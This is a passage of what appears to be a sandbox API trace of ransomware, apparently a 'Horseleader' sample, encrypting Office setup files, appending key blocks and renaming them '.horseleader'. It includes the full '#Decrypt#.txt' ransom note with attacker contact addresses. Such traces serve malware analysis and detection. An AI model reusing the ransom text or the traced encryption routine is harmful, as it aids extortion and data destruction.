pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.954] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.955] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 100 [0244.955] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.955] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=20577) returned 1 [0244.955] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.958] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.968] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.968] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x61, lpOverlapped=0x0) returned 1 [0244.968] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffff9f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.969] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x61, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x61, lpOverlapped=0x0) returned 1 [0244.969] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.969] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.969] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.969] CloseHandle (hObject=0x15c) returned 1 [0244.970] GetProcessHeap () returned 0x780000 [0244.970] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.970] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML.horseleader") returned 112 [0244.970] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml.horseleader")) returned 1 [0244.971] GetProcessHeap () returned 0x780000 [0244.971] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.971] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x468a2b70, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x83258520, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x468a2b70, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2213, dwReserved0=0xb541d799, dwReserved1=0xec7654e2, cFileName="VisiorWW.XML", cAlternateFileName="")) returned 1 [0244.971] lstrcmpiW (lpString1="VisiorWW.XML", lpString2="Windows") returned -1 [0244.971] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 103 [0244.971] StrStrIW (lpFirst="VisiorWW.XML", lpSrch=".horseleader") returned 0x0 [0244.971] lstrcmpW (lpString1="VisiorWW.XML", lpString2="#Decrypt#.txt") returned 1 [0244.971] lstrcmpW (lpString1="VisiorWW.XML", lpString2="_uninstalling_.png") returned 1 [0244.971] lstrlenW (lpString=".testttjffg") returned 11 [0244.971] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML", lpSrch=".testttjffg") returned 0x0 [0244.971] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.971] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.972] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.972] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 103 [0244.972] StrStrW (lpFirst="VisiorWW.XML", lpSrch=".txt") returned 0x0 [0244.972] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=8723) returned 1 [0244.973] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x2213, lpOverlapped=0x0) returned 1 [0244.975] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffdded, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.975] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x2213, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x2213, lpOverlapped=0x0) returned 1 [0244.976] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.976] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.976] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.976] CloseHandle (hObject=0x15c) returned 1 [0244.976] GetProcessHeap () returned 0x780000 [0244.976] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.977] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML.horseleader") returned 115 [0244.977] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml.horseleader")) returned 1 [0244.978] GetProcessHeap () returned 0x780000 [0244.978] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.978] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x468a2b70, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x83258520, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x468a2b70, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2213, dwReserved0=0xb541d799, dwReserved1=0xec7654e2, cFileName="VisiorWW.XML", cAlternateFileName="")) returned 0 [0244.978] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.978] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\#Decrypt#.txt") returned 104 [0244.978] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.981] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0244.981] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.982] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0244.982] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.982] CloseHandle (hObject=0x1a4) returned 1 [0244.983] GetProcessHeap () returned 0x780000 [0244.983] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.983] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e501370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1e501370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1e501370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Word.en-us", cAlternateFileName="WORD~1.EN-")) returned 1 [0244.983] lstrcmpiW (lpString1="Word.en-us", lpString2="Windows") returned 1 [0244.983] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us") returned 94 [0244.983] lstrcmpW (lpString1="Word.en-us", lpString2=".") returned 1 [0244.983] lstrcmpW (lpString1="Word.en-us", lpString2="..") returned 1 [0244.983] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.983] GetProcessHeap () returned 0x780000 [0244.983] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.983] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\*") returned 96 [0244.984] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e501370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1e501370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1e501370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb541d799, dwReserved1=0xec7654e2, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.985] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.985] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\.") returned 96 [0244.985] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.985] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e501370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1e501370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1e501370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb541d799, dwReserved1=0xec7654e2, cFileName="..", cAlternateFileName="")) returned 1 [0244.985] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.985] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\..") returned 97 [0244.985] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.985] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.985] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe076d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x1e501370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x978, dwReserved0=0xb541d799, dwReserved1=0xec7654e2, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.986] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.986] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 104 [0244.986] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.986] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.986] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.986] lstrlenW (lpString=".testttjffg") returned 11 [0244.986] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.986] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.986] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.986] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.988] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 104 [0244.988] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.988] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=2424) returned 1 [0244.988] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x978, lpOverlapped=0x0) returned 1 [0244.990] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff688, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.990] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x978, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x978, lpOverlapped=0x0) returned 1 [0244.990] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.990] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.990] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.991] CloseHandle (hObject=0x15c) returned 1 [0244.991] GetProcessHeap () returned 0x780000 [0244.991] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.991] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML.horseleader") returned 116 [0244.991] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml.horseleader")) returned 1 [0244.992] GetProcessHeap () returned 0x780000 [0244.992] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.992] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x1e501370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x708, dwReserved0=0xb541d799, dwReserved1=0xec7654e2, cFileName="WordMUI.XML", cAlternateFileName="")) returned 1 [0244.992] lstrcmpiW (lpString1="WordMUI.XML", lpString2="Windows") returned 1 [0244.992] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 106 [0244.992] StrStrIW (lpFirst="WordMUI.XML", lpSrch=".horseleader") returned 0x0 [0244.992] lstrcmpW (lpString1="WordMUI.XML", lpString2="#Decrypt#.txt") returned 1 [0244.992] lstrcmpW (lpString1="WordMUI.XML", lpString2="_uninstalling_.png") returned 1 [0244.992] lstrlenW (lpString=".testttjffg") returned 11 [0244.992] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML", lpSrch=".testttjffg") returned 0x0 [0244.992] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.992] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.992] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.993] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 106 [0244.993] StrStrW (lpFirst="WordMUI.XML", lpSrch=".txt") returned 0x0 [0244.994] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1800) returned 1 [0244.994] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x708, lpOverlapped=0x0) returned 1 [0244.999] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff8f8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.999] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x708, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x708, lpOverlapped=0x0) returned 1 [0244.999] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.999] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, 